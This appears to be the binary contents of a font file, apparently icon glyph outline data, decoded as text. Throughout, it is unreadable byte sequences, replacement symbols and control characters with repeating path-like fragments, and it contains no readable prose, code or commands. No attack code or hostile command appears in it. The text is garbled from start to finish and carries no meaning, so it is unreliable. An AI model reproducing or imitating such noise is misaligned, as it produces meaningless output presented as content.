J		����Dd�����0H_jr{�&'&#"/&'&'#67.67&'36767676;7>'&6767'#'##737657>3737"'.7>76:6=.#"76376&7'675226'&'&'&676#"723#'.?>;3#'&'&676#3?7"+67676366?&'&76'&"'.>7636""67546376&#7#'#7226#"/'&6767673#'76=.65&7&'6'&�9KD�1;
	&<7�FJo:8IE�5;
	";5�GKp$��0	
H



	j

	


+
	


	p
B
'J

'"6+(%}$	R
V
	


�G
��
85!+9P+5M<.rMKKM96-<M
$
*/P9.u�KN�.Y<�MAK9
&!
		 Z
	
/%	E
#D	

	
!7


%J$&Am	P	+(�R
.	��&;U�����-<IUa!"3!2>54.6"&/&'5&"&"&?636"&56'&'&7>2'".767676?62?63727363736"&54676327+&?64&&#5674301366767#&3276'.54676#"76'&'&76327#"'"#"&?6747326762%&#";7>&>?6&"67674"?276&3"?276&O�J)G))G)�)G))G���
Z

!%
)7O`F1^{

[	
F		
M	

�J	
O

�		
�

S
		�)G*��*G))G*�*G)�(
	4�
t.
#
#'V9	N3 .8
 

	%
*
	
			
���'>Oj{�����BU23676'&'#&'&##"?6767676&'&";6?>3676'#"&?4;647676'&#&676?;2'&'567>7"32676&'.567>7&&6&"#15";26767676;257676&3&767>'54&'"'&6;276'&#&7>31776'5&'"'&632>'.#5>27"&756&+'&723674?676763276?6%67656'&[!	iI!
	"^�� "	
&7	�	
"0�	  *�

t
	!(
i!5$
%
	
�	
�6!	�	
Is4. !$%fF�	#
'	^,$!


T	
	)) Z
!H	
n&
	<$
)
	

&	
	, 


%1
.	7

1&
4��2a�����!!"3!2>54.#"#'"&?6;63+"75'.767676?254'&&7467627+"&6?6765&/&;2;76;2#"+"?6;23+"75'.7676?254'&74?67627+"?6;2&#"7327676&%&#"327674#276574!"#276574O�J)G))G)�)G))G��

$q




v
%	 
p	
c



	

?
�
��
�	

��
�)G*��*G))G*�*G)��
}		
		

?

 637	%		%N
	!
		

-G	{

<
����)GW~����&'&'&#";26?>;676'#".?632&'&'&+";267>32767676''"&?>;2*"5'&+";6?6?676&#&7676+#767;2?676#"&5&76?2%&'&7>#767;26?676#"&5476?2%#";26?6&�4

),<	
	�
*
	

;	
�+gG%


#

>

� 	 
=�(�
�6, (
M#F
&
IJp%	�

"

PK
		O


M
I	


���������!"3!2>54.#?'&''"'6?676'5'#5"'&''&/6?7>&'&'#&'.676767676>5367>"#"7676=&'&'&&'4#'&"36?6;2&75.3&7656'5354736&'.O�J)G))G)�)G))G �*" <!(J;	(;A0"*!	$"
  	-,
"Q1A(	�s
		 	
	%(,
>�!
(\r	,�)G*��*G))G*�*G)��(3	.*		

	
'2
/R







3	
	 

�7q����&'&5#&.'&/&'&'&'767677674;357'&'7676=67'"'&'<'3?6'&'&>73'&"#"&'&'&'#"/.>767677676#.5&7476#476�:&0+#D)7; &/*8C!+
03'0:(%0!EXU #5Sg8"/+S-19,���."
	U;(&84

!

�8%*.%�� =
�C  &)
)-!	;@# %F&7'!#
*
^

V

	)
$$
(+
!��Eapv���!"3!2>54.#'"'5367>'&/&'&746762&'&"37#"'&/#5747674;"#546763"+53'"&'547574?62"+5437#5437O�J)G))G)�)G))G��!
.	



	�

6/.	4R-
;+-


N++B-*�)G*��*G))G*�*G)�{(	
&1
2�	Z$-M�		

�����	5Ybp���&'&##/5367>'&/&'&546763276?37436763;#"5&'&/##46767"+"546736?#'474767623#"57"&46�) 

5)2$?5'&
($!!_!"&=#!aV�S2xJ*�S  SN)"�

 f
J
.0�$':.<%
-#]?��+
��(	TCT\.%��""
��7�������1!"3!2>54.#"&'7324&'&54632&#"727"+01#41#'01#'01#501#01'#"71#'01/81'#4'101/#51"=815#5#5'5'5&=#?3573#7"#"#530163201301#53'"&4621"10""#01###"'5372437013501309251013737350;?01373023013337#01;3?3737013503737####+"'#/#'"'#'"/"5'&'&=4743?017578657017535343503?63525736;0137323:33331201'#"'5632#>32O�J)G))G)�)G))G��	
	+
	R	

)}/);00
�/)�N
�		�#�)G*��*G))G*�*G)�_#
	$

&E!!+$>G
a���p0�	$!*	$G		�-$48APg�624'&"3267'#"'&'3#"'56327&"'#75327654%3#7264&""'#356325&7#533275#"&=.46327&#"#"&'327654'&m2E^63)$y��	
3B@I(��JJ% 4AJ
�	/?	$	
�
	% (%/ 
(	)l007 A7>	2	n;#}��I!B<0�  �D:6B
83k(9
` 

6'!
		7&��7Et��!"3!2>54.2&'&'"#"&'&'&357676;7'#6?4;"'&?7>.'&'.76761&'&7*&/4/#"#'#676?6;2&"'3'O�J)G))G)�)G))G�c.+
(�

-?�),*		

!'

�8	)+&
�)G*��*G))G*�*G)��."�Z-<	���c'�!!
!!
!3;&N1z ?��!(Xi�����D[m�23267>7>;7373&5'&'.+"723#7>'&/&676?676&'&'&'2;747&+"276?#&&'.'37&'.'&#1327676766575&'"362326=#"6'5326=4#+5722'56676'."/&567>74'#&"22=46262326=6.&767'&'326'&>27"#4'4&+#33765'=226=66?'&'&67'.6'"";66=4&&4&#&";6=6'4>74&�Ib
H{�C�� #P6	4%B<)

 +
�@
.I}oPF	%(?!
6(H*6�59AGV`��,-<88
!
$H
+	u	

	��%!5A�!	�

$**
�

�


x
WD���=e;9
	

	
;


<

.�<	�*."��@: )��
��		)	 -$O

9f7	9 "	'"'	$
&*#	

Uc�.`	"�#Vf|�%&'&'&#'"3267>;73&'673'&/&'&7676?676&'&'&'7>%";265&+"+&&'.';2767&'.'&#�		$${Ib@��$
B<)

 +
# P6��	?1oE	F	%(?	Lo�
6(H*6�,+D�	��
dJ$=+		
	
;


<
<9�.�;,
�*."��@: )��/`������=Y]am{!"3!2>54.2;2656;6#"/01#%#&'01+"/4;234?6=63723?63+&=46;2+32+32'&=32756'5325'&'&6;2>&/&5676#"."7453+"+54+#"5/+"=4;23543#546327+532+;2+"73#"&'&7>'#"5'."+54;#"5'&/#+"=32353#53#53&#?>'4&"276'4O�J)G))G)�)G))G�	!
�E	

K64XBQ!
676Z+`!!
2-��)G*��*G))G*�*G)��'H(*@& '--)-BEC2/	!F		
			14�$*G++HHKF!5HX	H',J���	^	
	��,Kh������2Pfrvz"#4/5&+"#'&'5&+;2?332?"51"#'&'&+"362=47;5'%4=3;754+&5&/&+32"+#4/#;2=3;2=6&'4/&/176'4.+"32=476;5'#&=2#"&=#"76754%&327676&"/54632%&/&462636'&'&"'4+"676"#"5&5325&74+5;6=&6+"32=4&!+&4&;2'56+"=;6=4+325'32=4;2=#332"+;54%3#73#x	%'
*T,..	-F1+�	
		;%	$/��&
&?%
	!	��

	
+�"!$HN_ %KN�%]�&9:�>92
!@7
Cf<$b65h8c
*i>7e<9b)
	e <
XB	B.-	F	1C	�
)
		e
iG"#Fbbe�����j�R$7���76767676?676#!"&5.'&/&767676736'&'&'.767>'&76767>276?67672?676'&'.?6'5.'&'&'&7&'&7>76V!Cg28TN	9)3'&��d
[b940046g�- 5
	pm+$
,&dSPK	

%�u)':F5!

	
	;Z!-..!&-	 6H$)	:
$$�	

!7	$18f%.-PKJ?&"��r!

 


 $
%MQ�j�R;��%&'&'&'&/.&/&/&5476+'"#'.3!26'&2;76767676?675&'&'&7676&'&'&'&&'&/#762&76?5&'&7&7>76676'&'&/.&/.�

<-	V

 
W
�3���
.?
3(%
'.3	D&+
	+H93>
/"
��	:D"$	'&�H5
t:3a�/$=-(:

G&
	+7()-R")"	
	
	 
	

	. E
"+R	"�j�R?�%&'&'&'&/.'&5'&/&5&76&+'&#'&'.3!26'&3676767476?676'&5676'&'&/&'&6&#'"&?7#'#?65676&?65&767676732?67632667>76?6?3?73>767'&'&'&'5.&/&'&�

!A'	W
 
:� ���7Z),&	
	82	

			#
#

	
"@24(2#
��
f3%	''��n5
v;c�-'N9 
 *#(



(<	_
.A

		

	
	



	

,4

!(#>-(&
�j�R�� 3>76?6767654676?675&'&'&5'4?6/&'4'"'5&6'&&/&#'&'&'"75&5&7&6?"//&;26;673636'&5&?6?676762;274?46'&'&'&/.&/&'&4&'&/&'&&5'&/&5476+'"#&5.3!26'&%#)
	

	



		5

$6-*$'		O
!,XT	


V	�"��"$#	

	<7	
	
	

& &&)	$
-$5
�B!"��
4E#$	&%h4@3r9b�j�S4i�.'&/&#'&'&76&+"#4'.3!26767676?67676'.#.76'4'&'&/###'4>'&7476767637676'&'&'&'&� �
:
A
X
� ���$)>Q0*
	)^08,B
	
	
	
	@j."
^.0cu;
5�n�''		''�J5
;uH$7	,!&!	2"<&F)G$5-#o
-+@',	
*
.(+$=	���EN&'.'.#&"6?;3265&=36=326'4?>>.�2TT<&A10B�,+?,-N � ,@(PS����@���C>|<-?,-@-�j�T"0?Q`p��������&e��%&'&'.'&'&'&'&!265&=&747#"#"&=4'?7"#&5654'&?677'#56546'"&56546.56'546'&=467+"&=4'46'#"&=476'#"&=463+&=462'#"&56'546'&7546'&75467&#=65"#"&=776?67676'&56'76&'&#"&'&'&"767667>'&767676376?67676766?#67656'&&'&'&'&'&'&623767627326'&'&'&�P2+8QU50J8;"6��	3
)6

230123230	
/

2	'��=KQQh%0! .,J45U)
"	
#29	
!#	)s
& 	"N	�

	0 
=
/$ '%"C25"	)7�	t:	hE#	>{	
��-~
P�
Z�W���8�	��	0`KkH$f66�g9:�M}�-�<�		���		'�'�
.\E	�=Q2�yhG'O.0%g=,.	5p": <%,$!($/'

	

	




"p


,Q	
3�	�j�\*e|6'&'&/&'&/"'&'&'47#3!7674/&'&67276767727676'&'&'&'&'.3276764&�
,&.R3b
`5_�,	�!B'=
9(*B9!H%/+[.095P1; /%
&	#
�K?1 #



zFD|$* )%4T�Hl "4
;
dA3:qng7"QayYG		�j�[,Q4'&'&/&/"'&'.7"3!&'&76776?67>&'&'&�,"Jl3a
a3	5G#C+��/N�13@;+0&*P��[z9�T51 # yEEz0 )$5S�,B8=6#sa;+/|�4b	Yz�V���)4?264&"!264&"%2>4.""34.347&#"%"!4.�%54K44�+%44J54"$=#$<H<$#=!�&B�P�'B&�8_8�8_�4K45J44J55J4]#=H=$$=H=#�48��'A&���48&A�8_8��q8_8	�e�i?v������6766&75&'&'&76767676'&'&?6/&'&7>'&76?>7676#&'&'4#&'&7>&'&'&/&'&'.56'5"&'&=4'&'76767>=6"&462'"&46264.#2>.676?6&'&'&1~s@9!��@FFV!'#3|�	1:.%#eJ3


k
7#&&	& 5,B91?L?Qej�e,�WB�
*
�(5$(6T��F$) W/
6*7?	@d 
			cB#

�&(	!(

	
89
	(
ia�c
�e�RB{������76767676'&=67476764'&'63&'&'676?&67#&'&77>5&?>7676##&'&'4'&'&5>&'.'&/&'&'&="&'&=4'&'767676<"&462'"&462>.#2>.27676&'&'&?AFGV#(%	
	]d-&!!	 


1;5"gK4

s*!" ,	' 6-!A1
@M@Rfk�f*�NG�+!
�E((Y/*$
 
	0
)E7@		AeA%

"	cC#

�!(			
0
'


	
89
	)
/mb�d	
���l�%"+""'&/&+"!54'.701&'476'&'.'&'&'."'&'&'&137671676?73>5'"/&'&/#"&5476736767632�
""
>@\@�	
,2'Z`Z'0,
	
J/%&<FNMH>#%/J�
7?FF?7
%.*:,

,9*,$	�	%11%	!!nn!!|%,$"7	>/#%%#-@	7"$,%%B*22-?%f;)00);
�j�Y;|���%&'&/&'&'&/&/&5476&+&#'.3!26/&7676?63276?676'&&767'&'&'&/&'&'&#"74>26>'&6;276'.'4&'&'&'56546;227>7'&'&54763>&6276%01627>&'&1/&#7676&'&+"'#&'&+"&6�

CJ	%4J
[

�"
��5=*&6!	
":$0}:G

	0
&"E!+a1%
!	��-$4+!
	EG( A0		G		
O8#	��EB ' 
)'�V
	6 �S�+%,
#4S
;A_
&":
5=	



!n9%,*#(5
	�$


%+!%S����!?`mv�%4'4&#&"73726=763>&75#&676'&4&'&;2>=767676%2674."26.%264&�"��""#F".$	
(#�1*@!3
 #4.Q�#G,%%5"!
.�J.?3<4@�&78M57*'57L8+�~>""cc":IH#$.�#@�LPP1$F"!2"�'-5
!#t.Q�@.45.? 8L87N77N78%+��m	DP%!7'&/!&'326=4&'>73;26=4&'&'./%6 2676L�%

_e�
&�?d_
�`%
�uu�

%I&kBBk&I3�' i�j^<�c�<4c�e
|
gssg
|

|sH%,,%Hs|
���fLJOOJL�f�R'4!454/&'4767636'&'&54>2".�[ 8,E4)-LKZ+!$C-MZM--MZM-87=
	|X,<�

.L--MZL--L�icS"0"&'.767627>7>".4>O�=G1�	,-		A�#-#<(,)E4Y55Xh[85Z� ")lV�t	
/0M
r�D2* b6[gY54Y46[6�����88"#&"&'&7676767676'&/&7>'�5k�j'C E&*#e(
Ge;KmJr&3%-!
	z	F3)%%��9X.IE��'

!'"-�j�Rd%&'&'&/.767>7676'&'"&57676./#"7623767>76'&F 

(T7	+	5M$		"4 

/%wJ
�pD:!!
�


7 .&0
7cCDa7

	+/(
!LC0
'#=D$�j�R'/%&'&'&"!265&26764'."7'&'�@�Wnx\B0h��0M�&&'%��B@K'&��'%,c.$(�XIM&4o�)USM@B�B?L'%��B?L�+.�i�[!&'&767>#!&"&'76iJ-1��0-ElGy�ǒI
��7LDFA,2"$2/ADBJ6,a��.��n�O(%&'&"'&"!265&2>&'.#"�C�]v�bF4q��
N�K'&IMII>?�^NS(8z�,![OJ��A>GK�MI}%&�j�R+%/43732=#&'&'#'##;33!26=4��[v"h7F F5j y�� �f+ X�l=;n�X �,�##�,�i�[X!"'&=6'&7676?6?4'&'.'&'.'&7>'&7>7276'#'�&0'@/[/

K-%*q
	2cN5 ."7:!9t�	('5;*!+90@+190C'm
&

72	
0)8R(&���y�D
!3K".54>2""&767676#!"#"&7>#%&/.'&6767>1�@i>@j|j>>k���F
�&DKf
Aii��.

�"
 
&
!>	):2t?l@<j>?k}i?�	ݠ-+	��

����</O`
0 )	>~�ggS%2&'"'767>'456'.'>4."�
G�F:_9
*5:QOaXhW

3Y�:b:9ave<<e�,-
Kj:>S)
	

	:U+;gJ+;cuc:9cuf;�f�R*S`���!474/&5&'&'4767636'&'&56/'&'&=4/&5'&'&676?24>2".45476?65767463'&'&5.'&676'.76'&'&676�\
8,E4).MJZ+@$B! <
G9&-L[L--MZL-,&#
<AA#$��3R%\H
01p 9"4):	&P9J%=�I

	|�<�

2R[�<y"D7d"B&.L--MZL--L��('
�,X
�4�	
>uc7.2Y	�!:$ CU":)�����#!.Mq��&'.7676276?>".4>7276?>&'&/.767%'&'.'&76762767'.56'.764>.Bn2;)	
>#
	�	&2!F9+J,,IVL-+K�	
�-'7	�	
�to%'!,^	/	
�QB65M5&��2PN2	(L0`!ZG�^	A		)$	_�9($

�,KVJ,+JXK,Y
!Y�,#	�h!
Z�
1"&rG	1

>�>;	M=
=|)C"
8N
	
A����6`�%"#&"&'&767676?676'&/&7>'##7"#"'&'&/.76'&'&67>#%+"&5&7>767>/&'&7>�!C�C*+	

@T8/D/H/!!$G�""#-FD.!P"$&D"
+��+!2�
;)'
%'CL>7/, 	
_i7A.+lt
!;X$]kM7*dc

	"8�	3"%

_K"%ImXC������M�%&'&'4'&767632?6'.75656'&'&#23!>754'&&'&/&'&54&676?>'&'<'4'&'"&'&'&;27>5,4P&T
!7
##8.$
�,*"�D!86))	K
	/?
�$�&
&)2R
4%)&0/#	 +'[+a 	
		19/!&	B0

".&'��X��%&/&'.76742?6.?676.'"/#+3223767>76'&%6?67'&'.767632?6'.&7654.'&2265&?676&'&'&'.7>767676&'&'&/&'.62;>7435�1		9%7<	
	
"	!,=yL1%�"8%0
#,
$H(�
	
 
	
2>7
.	#	>=�
%!1	
%D.
Y9	
	

#
6+ 	-+-	 '2:% 	1!	"
	
( &"%
 
"$
������Cc&'&767>#!"&'&76%&'&>#&"&'&'.76'&67&7>76#&"&'&767676�/SR	
,C.K��@;<ga&{	}~)G3	�\
A/\99'*U	LM
'*=)#0*,* )+)/">g��n�-?5W-1.\ <�/+S*;IuIe.7J!72l%\|		@>C28
���#5O\o�����%./&#"'76765<%6?.'#&6'&%&'&"#767>5'4'&2>4."'2?67>7'.%&'&#7675&'&'3>76.'&>5.'&6767&632'326767654&'#&#"a;/(Z'0A#,-?:G:��!)6'IU
($,,8I=�{ 55@7 !7�	$&60>D
'6)!
NTI�
	2D36&$��#,%E+=/)I
Mc %%9;-#;"";70K

O0A!	
N�	66P>	e�6;S
	
	/0L2 6?6 6?7 y%>	.E-1AP68g	>P6AA14#.	>E*
<&.B6'#<.G	";F;#���� 9S`t�&/"'767>5<'.%6?.'#&65&%&'&'&#767>5'4%2>4."'2767>7'.%3>54&'&p/s0'@&
+78OGYH		I��"*3E/

`d
	V!-71"D	[K	�'C''BOD))D�
-%0C#'?"(D�-V5K;"B/+6-	3H'Q)
	

`=\C&%
*7FM
~9`3&C"Gi
;;=(DNC('COD(�.N$9+B$(A&
 L/9Q8"V���:X]a�"32>4.'&'&/?676?6;6?676'"2?6767654'&'&53&537.'&'"'&'..547676254�(B(%!#*'D((C
		

$0wfc9<-4L
X�WK4-;:cf���~,&)1
*V�EU$&97_a�a_79&$�'CMD(CPD'��
		�<:cfwLFE9B+
)*+C9DFLwfc:<��w�
	�w�,QT�0	hE&3yAqa_7997_aqAy3�j�R��;S�376?67675676?675'&'&5&?6'&'&#&'&76#&'5.'&'&'"=&'47&6?&//&"732?673673765'&?676?6367>;265746'"'&'&/.&/&'&5654&/.?67016&#>=4&'.'2"?676/&'&?737>76'&#&&&'&'&/&/"'&'&'&753!26=4'&%
%	)


		
	

2!4	
$6.)$&		�		)	
=	
J

�

"'KZ/\
Y2_$#		��	! #

<8
	
		.
* !&
"	
%


-#6��+"


		[)r@?s

)%-
)"�j�R3�����6?676767>732767676'5&75!"&56'3'&'.'&'1&"'&'743676756/&7672'5&567676767"'&76'&276?67676'&'&'54&#"63>767676676&'#&'&'2764'&"#264&"	&Bd/\
]/P*#)	�`�
0%D	
+1#.( #%.K&/E%	*&F
H%%
.Y-X.

O0'	D	D\58
E0eCb <�%%7"">&#!qBBq!.=D$�2_+:&=)+	

.Q"+65%M2/�j$
	+
b66a	'&- 
K&

1"P
��p�L(@%.7654'&'&"3276762?64'#"'&'&476762 E;:bd�eb:;;:bevDA?6�	@��,n<ZML,--,LM�MK,-$�k�veb:;;:be�eb:;&�@&)-,LM�ML,--,LMZ8g�j�R2<%'2644'&'&"27676"'&'&47676234>35"��3Q�M7�32UW�WU2332UW�WU23��LB?&&&&?B�B?&&&&?B��?*H*<d;
�Q4�7M�fWU2332UW�WU2332UW�&&?B�B?&&&&?B�B?&&*H*?;d�i�R(9IT_j�%.7654'&'&"327632?64/#".4>254&#!"3!26#";6#";6;&5#""&5463!24&#!"3!&'d+'&AC�CA&''&ACNXGb �H(;e;;dwe;����L���E\HWHAk�	5*
��"DQNCA&''&AC�BA&'1b!�	;ewd;;e;H�00F/%k.j/%�&<0
e(������/@R%.7654."32762?64/#".4>2%467!"3!..#!"&/.+"!�#>j|j=>i>H:Q
�	2@/Q//Q_Q/�A>6�"
�BPL��*

*���8B>i>>i|j>)Q�
*/Q`P//Q/<5Ds$��	!�

l�q�L'?f|��%.7654'&'&"3276762?64'#"'&'&476762'676/&76/&'&'&267676'<63676#".4?#'.;26?6'&?&#;26=4&'!F;:be�eb:;;:bevDA?6�>��,n<ZML,--,LM�MK,-$�#		+2,�9(&>!%/
h	j!	h

/%�lveb:;;:be�eb:;&�
>&)-,LM�MK,--,KMZ8g�	*
)		  3	 '#6�9$?	
FCE
	?$9����/q�%.7654."32762?64/#".4>2%46>=46?636=4&"/&"?626/./.&546?6�#@m�m@@m@I<Q
�3C1S11ScS1��	�������f	)��	a9DAm@@n�m@)R
�+1SdS11T19q
A6
i�
�~~~
��~I3
i
i��
�p�L(@X|%.7654'&'&"3276762?64'#"'&'&476762%?626=4&/&";26=46;2;26=4&/&" E;:bd�eb:;;:bevDA?6�	@��,n<ZML,--,LM�MK,-$����		��=U
UU	��	�k�veb:;;:be�eb:;&�@&)-,LM�ML,--,LMZ8g�(��(��N�
UU
�tt�p�L(@�%.7654'&'&"3276762?64'#"'&'&476762'&6?6'&&6?>'&&6?>'&'&'&'&2?>264/&/&'&67632?6?>'&' F;:bd�eb:;;:bevDA?6�	@��,n<ZML,--,LM�MK,-$�EEEEHLI:)��
�
L
	4
B�j�veb:;;:be�eb:;&�@&)-,LM�ML,--,LMZ8g�EE
EEC

;
F#
��
�~MB
F��0@Pao�%.7654."327632?64/#".4>2#";2654&7#";2654&!#"767>=4&&#"7676&4&+"3!26'&'.#!"&w'Cs�sDDsDN@Y
!�7E4X44XhW4�p==�>>>!�-/�Z�
�~�=IDsCCs�tC-X!�-4XhX34W4 ="��W���A	$|^8*�RB�����$.;]%.764."32762?64/#".4>2%2>4."6&#"&/&32764'&'&54� =fzf<<f=C8J
�9.N..N]N.�=g<<gzg==g�'/3]#K_J�kWU5 %6zg<<gzf<%K
~.N\O..N/;�<gzg==gzg<+(%+�_Z`"	&:<DF�j�R3%67654'&'&"32767264%"'&'&476762��4:7`b�b_8998_bsIFB8
��aSP/11/PS�SQ/11/QS`�9FHOq`^7887^`�`^78,�	�0.OR�RO.00.OR�RO.0��MRd��%276764'&'&#"5!264&#!"67>2"'54>2#"'&32>4."&'.76264'&'&&#"'.'.32676&%2?264/7>&"'&" OCB&((&BDO<k*�

�X r�oAAp�;"9B9"!9"
	
%/O//O^O/+
StS

QPubr�Za1�IVKI_

85TVbU�7��
('AD�CB&(.*�
��	;CAo�pA#�!9""9C9!	
.P^P./O/�*>
	
>b6�$	`p��8=('�T

aPN,.F@���R/<%.''&'>767&767767'".4>2ZH<A/2+iFq�&9F:=&	/&
"!'&"9"!:D9""9�#8=C%+R]�/P/
%!6eOV$#")"

!9D9""9D9!��a.7676.'&5&5>2>54&'&#""&46�MUXVR�""30LOWT�i +�FvEA8=LF<9FEw= (*>**DnMQZVJH+,G�P% �2"!�3DvEAu"&#!u�uEO(>+*@(���#5H����2>4."676'&'&'&%767676.4'&'&#"7676'&'&'&'&'&7>2767>76'&'&'#&'&/&767676?35&'&'&/57353%35#�++4+,�=	 �!+1&G	&_0>j%-(6-.* 

,)

(H'#%
��{"
B8X
9
:>��	15%>I>%%>J>$�
A#.$'� :*>5#*e�# 64�
  .(>
&" 
!;B"D!
�
'+	Q��	
���҈	y���*5@KVa"276764'&'&#732'#732#732'#732'#732#732'#732�wfc9<<9cf�fc:<<:cf��TP#
SQ#
xTP#
TP#
TP#
wTP#
TP$
<:cf�fc:<<:cf�fc:<�j�j��j�j�j�j�j��,#"'&'&5462;2>4'.+"&46;2 X_RO.03I3/Q/X/Q/)�$33$�G>;#$0.ORX0/OR_�$44$�K0P/)FS%")3I3-+KL�MJ,-�n!,GN#53+!%32654'&+4'&+3276%!27673#"&54632."U���0$"+�e(*��s$,'f�#$us$$��&D	h!4^NwkV2*'^1I!7��!_'& 8"d
6#&	��+	�
�3;	$#9`lgk)"9)*&���,8E27>57/&'&'"'&'&'&/&'&/&'.'#"332+"&46463!2#!"&�KA>L
	
'#V$�KA>KK>AK��9��X&%K�

)'" )&%K��K%&�,,��,���
(=4'&+3276#32764'&!"3!2>54.!32,"ON&
5YZ0�� 66 � 6  6����B,#
%!/�m��1� 6 �� 6  6 � 6 �8$%5
&E3"?���!?/57676
7676763&'&'567676?676'&g

&%#�����k)k"F
�0�Gz���8
��"

��f	$��7!2>4.#".#""��=e<<f<		?\6<g<6Z51U#<gzg=4T0=g=	5\jY6���*Ji��!"3!2654&67676?6&'76'&/&'&=676763"'&'&/&'5676&'&76?2/&'&/&'&/&'&'&/&767676?676#/&?6?6?6762W�:"00"�"11��	

		
	D		�

			�
	

(	
!')
 . #
				"&(
	
1"�:"11"�"1��3"/

!)#2 	
		/6&6	&4I
338
5< �

JM

!��+

$







((
	
���!!!!?k�J�N����l�����N�N��C3%3'333'5#7#3353�!�������a�lk��k~k�a7��M��q�{�����p�����0ER_ir{��������5#&'&'53676#5.%"'&'&4767624'&'&"27676".4>274."2>6767#"264&"264&7"264&"264&'"26."264&"264&%"26.7"264&"264&2YwU&#�d:8V)&_V96h2RB53WZ�ZX3553XZ�ZW35&0.NR�RO.00.OQ�QN.0��0Q00Q`Q//QY%?J@%%@J?%G]7=U%'$y !-  C
��K�


��
: M9Ux]9&$U<9a8'$�l96UWkjZX4554XZ�ZX3553X[i_QO.00.OQ�RO.00/OQR0Q`Q00Q`Q0�%@%%@J@%%@�U6<i6),!$"m!-!!-!����BMs! ���#!33?!5#'�K��
��K�����͠��3��	
%)#35373#3##3#3'53%#3#3'#53ڛ�DkXXXXh꒒�:Uꜜ�NDD�����{�����WD��DW霜��DW����(<Q7'&'&'&'&6767676767'%7'&'&'&'&76767676767'�� #�&-�
&-7�!"
�K�"$�&-�%,7�"#F�&-:�!#�q
#$
�&-8�'.;�"%�
	!#
�&.8��� /8BL."2>4%2&'667#"'6475327&"'>77&'632'"&'67&o:��dftudg��t�K�f=vAN-�0GPB�� (��W�*\m{d'�O2?�-D.58<8cLA�7P4:et:;���;;v��TN1tS�=%Pu(L�	0#�Rj�MM����G+��O�&!=S^v��� *8EPZ"276764'&'&&#1"&'6'2&'6+"'>4567."&'67677&'6;2�wfc9<<9cf�fc:<<:cf�!&GE4/q�<75-@h9=&t%"FP=;_{%��lT7''*U8g,0Pb)<�(%!@F
J<:cf�fc:<<:cf�fc:<�)d6	"1�$K,lN#'7@
Iu��*-%M1=.p��# 3.L t�<ssCq����%77'#''%'7'��������8���X���U����������L������0�%�..��ۚ牡����&;DM676?636!2#'".'&54>"#"3!265'4&#"&4624>&�	!�@+N6	7Q.��2T5, Dss*5.�-54/0@00A/�&0?1/?1	(E*cb4-H(-O1V "��4*To7)5.�/5� 00A//  /1@/1���3#"2767654'&'&".'&67626?676�wfb:;<:cf�fc:<;:bfKdldK	n�n<:dfxvec:<<:cevxfd:<��4Q++Q4	@OO@	��cB&'&'&'&/''?67676767676'&'"'&'&'&'&'&74?67676?77"#Y
 (!&O
.
E	!"!Q?9+'��0&#	

/!)�
QF:0& "
)",&0&* C61'"+&5/:18,/! �" #"
<1&
#$(!
��w7%767676765.��3�y�Y7�MP<`-'7IMO�򬩺�&0R���3#��kkx#7%.+'&'&'&#"#7676765732+'&'&5435;7676767676767654'&'&'676762'&0���\ j#%�	)?9,#
	
$	\	 ,"5_



		�
57W��$%



		�'
3:S5E
	b
(P
	
	)E%I"
$'/4=�[G+��
		���"73276764'&'&'77�vec:;,*L�>?vec:;;:ceKn��r�76\_n^SR8�R76\^�^\68��ww�ww���#5476;5'"#333��
b�E-%VV�z�[� .%+d��K����.\%654'&'&''676'&'&'&'4727>54&%7675""'"'#'"'&/&'&7#6
-:
Y7+	6f!<En]_�_\nC�G(?-'"&#$

 ,
9!#�
M91'"F53+F7-)* "&'�Y_M8>A%/PP/$B�B:4@71XH(-T
26HY� ".4>2".4>2�4YjY44YjY4�4ZjY44ZjY4^5Y44YjY44Y55Y44YjY44Y�<('#676547676#&#67676767&'767676'&'&''&#32454'&'6'&7>7&/&'47>76'&'"'&'.767676767'&'&'/&>763>7&767676&&>>7676'."&'56676;676.7>676'45&>.p		
FH
	 =H	


	"%

!
	$,

	 v
$
	"	+
! #
 

�-+9%


	 	
%
	
	


		
	




)	%
	


�,/'& 

6��4;!"7676;27>6&+";2+5463!2�.+

��'N"M	��
�
z
�(
8�97~e	g
�J���%#"3#####5354>;#"354>;��!���暙�8_8��!�8_8�m.!L������L?j>�.!LL?j>���!!!!%3#!!%!!?k��������Pl��h����%����������:IX'&'&'&767>&'&'&'&'&7676767>'767&'&7>"'&'&7676�'26I;5!6
+&TNNR#,B*
#!)9
��
&+&N�O!"

,5(0

0-q46#'%#&	SR)&VT



Se-�%'#�v!'��QQ^gpy67654'&/&'&37676?676'&'&/&'&'&'&76?&>&"&462>.'.>�/	
09/5)+&

$( $$'

$		
		&
B44&
(44&
��"0##0"�(,)W*!*" 



4& 
		
�*@B3*@B3]+<<U<<�6E)	6E*372����/7&'&#"7'#7673676�)&���; "���;HKPueb;8��, ���8Q+4B48<9dYV6g+	�0>@�U)/-N�[��JPD?= �1?F?.
"!��m9`�&'&'&/&'#+27676?6?6?6?67567676#"'5463676?&+.=&76;273"'#&=476767'"&=&76;2fJ"%HW	1�XG		0[knV	�g$;�	�&	\

�	�oO$/
mYu69(&<-:x2O

(46
.W1!/
�
� 9-	
	���#)=&/&'&'&#"76?>767676=4'"'&'&7547676320+835E>C*/
+8rh$.
�� 24:@+' :AW+-:#F(]��8I%=0) �% 3>3�t"."32>54'!3#".4>327&#33535#5ULKK>ALOzB���%3/O//O/B-LNHOOPPPtK��%&E|O!`/Q`Q/+HI�OPOOPO���-4'&'&"67>76'67654&'632�<:cf�fc9<-,�b	 vz^�*,�		5I>9`9-O�^RO.00.OQ_RIGbfT �bEH�&8;AH{$=h>7_@����B"27673276764'&'&'&'&'&'&'&54>3247632�wfc9<ME%A2@DGwfc:<<:cfZ
,%$ ,#<$-#=#�-+KLZH.Z8 -+KL�LK+-��##
$=#
*!#=$�p�M3GP"2>4.".4>2!"3!2767654'&'&#!".54>3!2'"264&�EvFEw�vEEvF+I++IVI++I��\MBALLABM�MC@&''&@Cn2V3�\3U22U3�3V2�((8''_Ev�vEEv�vE�a+IVH++HVI+�'&�M�]M�&''&@CM�MC@&'�@3V22V3�3V22V3z(8''8(���.CY\m�!"3!2654&"'"/6?.54767624&+";26=3267."32?33276/#7#54&";264&?6."54&"26=72764'e�((�((�r(r	
LZ00PS�SQ/11/QS�i  L1>
8)�,
Bb/9

0(�()�(�TON.%~JLB?&&&&?B�A@%&Xzz�
		(:Zx		�</:,		�-@���4!"3!2654&"/#"'&54627632u���Cv)')IX(!Pa���r�R"#(.&1K$ s{�9?c"264&%#54&"32653/7#64&"5#54&"#32675732654'%'764&"'4&"#326735732654'w*�V&&�S<
